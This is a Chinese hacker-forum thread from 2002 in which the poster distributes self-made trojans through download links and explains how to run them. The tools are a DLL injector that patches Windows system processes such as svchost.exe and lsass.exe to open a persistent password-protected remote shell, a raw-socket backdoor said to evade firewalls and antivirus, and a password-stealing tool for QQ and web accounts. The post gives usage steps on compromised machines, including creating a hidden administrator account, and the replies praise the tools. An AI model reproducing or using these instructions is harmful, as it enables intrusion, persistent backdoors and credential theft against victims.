>> 欢迎您, 傲气雄鹰: 重登陆 | 退出 | 注册 | 资料 | 设置 | 排行 | 新贴 | 精华 | 管理 | 帮助 首页

  小榕软件实验室
  刀光雪影
  注入式木马
发表文章 发表涂鸦
  回复数:12  点击数:369 将此页发给您的朋友        
作者 主题: 注入式木马 回复 | 收藏 | 打印 | 篇末
mf117帅哥哦
级别:精灵王
威望:0
经验:0
货币:2217
体力:100
来源:61.183.64.*
总发帖数:362
注册日期:2002-03-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

[http://61.183.19.100/dll_new.rar
《兼容性》

注入Dll到exe文件, 实用与win98,win2000,winXP系统。

Shell安装成服务, 实用与win2000,winXP系统。
//////////////////////////////////////////////////////////////////
《使用说明》

假设
a>肉鸡的 Ip 192.168.0.66
b>肉鸡win2000目录为c:\winnt


1. 把 iNetPub.dll 和 dll_in.exe 拷贝 到 “肉鸡”上,
2. 注意: Dll_in.exe 要和 iNetPub.dll 在同一个目录下
3. 要用全路径 (绝对路径)。

4.
Dll_in.exe -exe c:\winnt\system32\svchost.exe




在系统进程中开一个 shell; < 端口:1193 密码:abc123>


5.
telnet 192.168.0.66 1193

密码:abc123

6.
你 用fport 可以查看,1193端口 在 svchost.exe下(系统进程中开一个 shell)

7.

Dll_in.exe -exe c:\winnt\system32\svchost.exe


Dll_in.exe -exe c:\winnt\system32\servers.exe


Dll_in.exe -exe c:\winnt\system32\lsass.exe


Dll_in.exe -exe c:\winnt\system32\calc.exe

Dll_in.exe -exe c:\winnt\system32\telnet.exe

用一个即可。

因为,shell开的端口固定为1193,只有第一个开的shell采起作用。

/////////////////////////////////////////////////////////////////////////////
《修改原理是》
改变svchost.exe他的文件头,如果win2000,winXP没有对关键的文件有恢复机制,
下次win2000,winXP启动,shell仍然起作用,否则下次win2000,winXP启动, shell失效。

win98下永远有效。


///////////////////////////////////////////////////////////////////////////////
《解决win2000,winXP再启动shell失效的方法:》
插入Shell为服务的形式,

a>把shell以服务的形式注入到servers.exe文件中

Dll_in.exe -install c:\winnt\system32\servers.exe

这样,下次win2000,winXP启动,shell仍然起作用。
用fport 可以查看,1193端口 在 servers.exe下(在系统进程中开了一个 shell)。


b>如果想把shell以服务的形式注入到svchost.exe文件中
<1>先卸载服务
Dll_in.exe -remove
<2>安装注入Shell的服务
Dll_in.exe -install c:\winnt\system32\svchost.exe

这样,下次win2000,winXP启动,shell仍然起作用。
用fport 可以查看,1193端口 在 svchost.exe下(在系统进程中开了一个 shell)。




[http://61.183.19.100/dll.rar
在系统进程中插入SHELL


假设
a>肉鸡的 Ip 192.168.0.66
b>肉鸡win2000目录为c:\winnt


1. 把 iNetPub.dll 和 dll_in.exe 拷贝 到 “肉鸡”上,
2. 注意: Dll_in.exe 要和 iNetPub.dll 在同一个目录下
3. 要用全路径 (绝对路径)。

4.
Dll_in.exe c:\winnt\system32\svchost.exe




在系统进程中开一个 shell; < 端口:1193 密码:abc123>


5.
telnet 192.168.0.66 1193

密码:abc123

6.
你 用fport 可以查看,1193端口 在 svchost.exe下(系统进程中开一个 shell)

7.

Dll_in.exe c:\winnt\system32\svchost.exe


Dll_in.exe c:\winnt\system32\servers.exe


Dll_in.exe c:\winnt\system32\lsass.exe


Dll_in.exe c:\winnt\system32\calc.exe

Dll_in.exe c:\winnt\system32\telnet.exe

用一个即可。

因为,shell开的端口固定为1193,只有第一个开的shell采起作用。
8.
修改原理是:
改变svchost.exe他的文件头,如果win2000没有对关键的文件有恢复机制,
下次win2000启动,shell仍然起作用,否则下次win2000启动, shell失效。


[http://61.183.19.100/raw.rar
原始套接字木马新版
这是一个基于嗅探原理的原始套接字木马
适用于win2000和XP

该方式的优点:完全基于非连接状态,使用原始包进行
通讯,不同协议有关,可使用任意协议。

作者:mf117
EMAIL:mf117@etang.com

下面是常用的命令的举例说明:
1> 添加一个Admin用户:
net user user6 pass /add
net localgroup administrators user6 /add
2> 执行一个GUI程序:
calc.exe
3> 执行一个命令行程序:
cmd /c dir c:\ > c:\66.txt
4> 重启计算机:
iisreset/reboot
5> 打开远程SHELL:
start_shell


说明:以上的命令只有 5> 打开远程SHELL 是我的
程序提供的功能,端口号是:3371
你可以 telnet ip 3371 来控制对方计算机。密码:abc123
每次只允许一个用户联结,exit命令退出并关闭SHELL。
发现BUG请给我来信: mf117@etang.com


http://61.183.19.100/raw_muma.rar
原始套接字木马
raw_c.exe 为客户端,raw_s.exe为服务端。

该木马优点:完全基于非连接状态,使用原始包进行通讯,不同协议有关,可实现部分的隐藏地址(如果是非交换的局域网则是可以完全的隐藏地址)、可实现无连接反向通讯、甚至能够突破一些防火墙的监视。

安装简单,raw_s.exe直接运行即可,我做了实验,可以通过天网,金山毒霸,等放火墙。

我采用 服务+注册表双重隐藏raw_s.exe,用于知道的固定IP的计算机上安装此木马。




http://61.183.19.100/mail_new.rar


在命令行下:
1> kp -install -->安装成服务,每次为自启动 (对 win200、win XP 有效)
2> kp -method2 -->在 /RUN 下使他为自启动 (对 win98、win200、win XP 有效)
3> kp -->安装成服务和在 /RUN 下使他为自启动



如:QQ 、宽带 Enterner上网、www.yahoo.com.cn、的密码都可以发送。



[ 此消息由 mf117 在 2002-12-05.18:59:24 编辑过 ]

编辑 删除 发表时间发表于 2002-12-05.18:58:42   MSIE 5.01 Windows 2000IP: 已记录
狼族骨剑帅哥哦
级别:高级站友
威望:0
经验:0
货币:532
体力:46.9
来源:北京
总发帖数:132
注册日期:2002-11-28
查看 邮件 主页 QQ 消息 引用 复制 下载 

能不能把倒数第二个....说详细点阿......谢谢

编辑 删除 发表时间发表于 2002-12-05.20:25:38   MSIE 6.0 Windows XPIP: 已记录
mf117帅哥哦
级别:精灵王
威望:0
经验:0
货币:2217
体力:100
来源:61.183.73.*
总发帖数:362
注册日期:2002-03-27
查看 邮件 主页 QQ 消息 引用 复制 下载 


http://61.183.19.100/raw_muma.rar
原始套接字木马


里面有说明

编辑 删除 发表时间发表于 2002-12-05.21:05:32   MSIE 5.01 Windows 2000IP: 已记录
傲雪帅哥哦
级别:中级站友
威望:0
经验:0
货币:379
体力:41.7
来源:云南
总发帖数:65
注册日期:2002-02-06
查看 邮件 主页 QQ 消息 引用 复制 下载 

哥们,又有新作了,恭喜!!!恭喜!!!下不了呀?能把dll_new.rar和dll.rar给我发一个来吗?我的email是hzczj@163.com

编辑 删除 发表时间发表于 2002-12-06.09:43:20   MSIE 5.0 Windows 98IP: 已记录
mf117帅哥哦
级别:精灵王
威望:0
经验:0
货币:2217
体力:100
来源:61.183.74.*
总发帖数:362
注册日期:2002-03-27
查看 邮件 主页 QQ 消息 引用 复制 下载 

1.《嗅探原理的原始套接字木马》-->不可以本机 既当 server 又为 client,需要 2台计算机,


编辑 删除 发表时间发表于 2002-12-06.12:36:28   MSIE 5.01 Windows 2000IP: 已记录
GoodGood帅哥哦
级别:新手上路
威望:0
经验:0
货币:112
体力:30.4
来源:61.179.120.*
总发帖数:4
注册日期:2002-11-25
查看 邮件 主页 QQ 消息 引用 复制 下载 

好东东!!

编辑 删除 发表时间发表于 2002-12-06.12:44:39   MSIE 5.01 Windows 2000IP: 已记录
小东帅哥哦
级别:精灵
威望:0
经验:5
货币:1019
体力:94
来源:北京
总发帖数:273
注册日期:2002-08-26
查看 邮件 主页 QQ 消息 引用 复制 下载 

怎么那么麻烦啊?能不能直接做成一个exe的文件直接在肉鸡上运行的啊?
----------------------------------------------------------
★东星网★http://eaststarnet.51.net

编辑 删除 发表时间发表于 2002-12-07.17:18:15   MSIE 5.01 Windows 2000IP: 已记录
冬阳帅哥哦
级别:高级站友
威望:0
经验:0
货币:773
体力:60
来源:江苏
总发帖数:176
注册日期:2002-11-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

不错
----------------------------------------------------------
我爱vc++~~~~~~~~~~~~~~~~~

编辑 删除 发表时间发表于 2002-12-07.17:40:34   MSIE 5.0 Windows 98IP: 已记录
wefans帅哥哦
级别:侠客
威望:0
经验:12
货币:50
体力:100
来源:211.139.112.*
总发帖数:4
注册日期:2003-01-01
查看 邮件 主页 QQ 消息 引用 复制 下载 

win98上有点问题!
----------------------------------------------------------
@-学无涯---技术作舟-@
http://wefans.yes8.com

编辑 删除 发表时间发表于 2003-01-02.13:47:15   MSIE 5.0 Windows 98IP: 已记录
影子Y帅哥哦
级别:精灵
威望:0
经验:5
货币:1134
体力:100
来源:湖南
总发帖数:292
注册日期:2002-07-03
查看 邮件 主页 QQ 消息 引用 复制 下载 

不是很好
----------------------------------------------------------
滚滚长江东逝水,浪花淘尽英雄;是非成败,转头空;青山依旧在,几度夕阳红!

编辑 删除 发表时间发表于 2003-01-02.14:32:04   MSIE 5.0 Windows 98IP: 已记录
指间沙帅哥哦
级别:圣骑士
威望:0
经验:4
货币:671
体力:80.6
来源:61.186.209.*
总发帖数:181
注册日期:2002-03-29
查看 邮件 主页 QQ 消息 引用 复制 下载 

想法很好,但简单易行就好了。
----------------------------------------------------------
为中华帝国崛起而奋斗!!!!!!

编辑 删除 发表时间发表于 2003-01-03.00:24:20   MSIE 5.01 Windows 2000IP: 已记录
qez1帅哥哦
级别:侠客
威望:0
经验:7
货币:67
体力:100
来源:河北
总发帖数:113
注册日期:2002-07-25
查看 邮件 主页 QQ 消息 引用 复制 下载 

~~~!!!!
很好啊
thanks
----------------------------------------------------------
幻蓝

编辑 删除 发表时间发表于 2003-01-03.07:34:22   MSIE 6.0 Windows 98IP: 已记录
netfox帅哥哦
级别:圣骑士
威望:0
经验:12
货币:504
体力:75.8
来源:山东
总发帖数:240
注册日期:2002-03-18
查看 邮件 主页 QQ 消息 引用 复制 下载 

试试
----------------------------------------------------------
有约不来过夜半,
闲敲棋子落灯花。

编辑 删除 发表时间发表于 2003-01-03.08:41:23   MSIE 6.0 Windows 2000IP: 已记录
选择回复        
 快速回复主题: >>>高级模式
  用户名: 没有注册? 密码: 忘记密码?
记住密码
HTML语法
禁止IDB代码
禁止表情字符

[按 Ctrl+Enter 快捷键可直接提交帖子]
 投票评分: 共 0 票  
所有时间均为: 北京时间 ↑TOP 
关闭主题 拉前主题 移动主题 主题置顶 取消置顶 总固顶主题 取消总固顶 加入精华 移出精华 删除主题